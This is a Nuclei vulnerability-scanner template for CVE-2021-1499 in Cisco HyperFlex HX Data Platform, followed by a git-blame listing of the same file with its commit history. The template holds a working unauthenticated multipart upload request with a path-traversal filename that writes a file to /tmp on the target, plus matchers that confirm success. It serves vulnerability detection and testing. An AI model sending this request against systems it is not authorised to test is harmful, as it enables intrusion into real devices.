nuclei-templates/http/cves/2021/CVE-2021-1499.yaml

id: CVE-2021-1499

info:
  name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
  author: gy741
  severity: medium
  description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
  impact: |
    Allows an attacker to upload and execute arbitrary files on the target system
  remediation: |
    Apply the necessary security patches or updates provided by Cisco
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-1499
    cwe-id: CWE-306
    epss-score: 0.96404
    epss-percentile: 0.9945
    cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: hyperflex_hx_data_platform
  tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json

        MyPasswdNewData->/api/tomcat

        -----------------------------253855577425106594691130420583--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"result":'
          - '"filename:'
          - '/tmp/passwd9'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fa36a9d178b9ebb108a9bbe6d1d8d8ce53ca52f5e4550afadf4d55892da9d871022100e3940cb129221d201488409c510c49cac7b0ad931346b0307e860f77bba8364a:922c64590222798bb761d5b6d8e72950
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`id: CVE-2021-1499`

			`info:`
fix-conflict 2022-10-25 13:40:49 +00:00			`name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`author: gy741`
			`severity: medium`
fix-conflict 2022-10-25 13:40:49 +00:00			`description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Allows an attacker to upload and execute arbitrary files on the target system`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the necessary security patches or updates provided by Cisco`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`reference:`
			`- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz`
			`- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html`
fix-conflict 2022-10-25 13:40:49 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1499`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`cvss-score: 5.3`
			`cve-id: CVE-2021-1499`
			`cwe-id: CWE-306`
TemplateMan Update [Thu Nov 16 10:31:48 UTC 2023] :robot: 2023-11-16 10:31:49 +00:00			`epss-score: 0.96404`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-percentile: 0.9945`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: cisco`
			`product: hyperflex_hx_data_platform`
			`tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco`
Update CVE-2021-1499.yaml 2021-10-04 14:39:39 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`- raw:`
			`- \|`
			`POST /upload HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583`
misc update 2021-10-02 12:32:45 +00:00			`Origin: {{RootURL}}`
			`Referer: {{RootURL}}`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00
			`-----------------------------253855577425106594691130420583`
			`Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"`
			`Content-Type: application/json`

			`MyPasswdNewData->/api/tomcat`

			`-----------------------------253855577425106594691130420583--`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update CVE-2021-1499.yaml 2021-10-04 16:06:06 +00:00			`- '{"result":'`
			`- '"filename:'`
			`- '/tmp/passwd9'`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`condition: and`
fix-conflict 2022-10-25 13:40:49 +00:00
updates 2023-07-05 07:50:14 +00:00			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: header`
updates 2023-07-05 07:50:14 +00:00			`words:`
			`- "application/json"`
removed enhanced by comments 2023-07-05 08:07:58 +00:00
updates 2023-07-05 07:50:14 +00:00			`- type: status`
			`status:`
Merge branch 'main' into remove-comments 2023-07-07 11:08:46 +00:00			`- 200`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 4b0a00483046022100fa36a9d178b9ebb108a9bbe6d1d8d8ce53ca52f5e4550afadf4d55892da9d871022100e3940cb129221d201488409c510c49cac7b0ad931346b0307e860f77bba8364a:922c64590222798bb761d5b6d8e72950`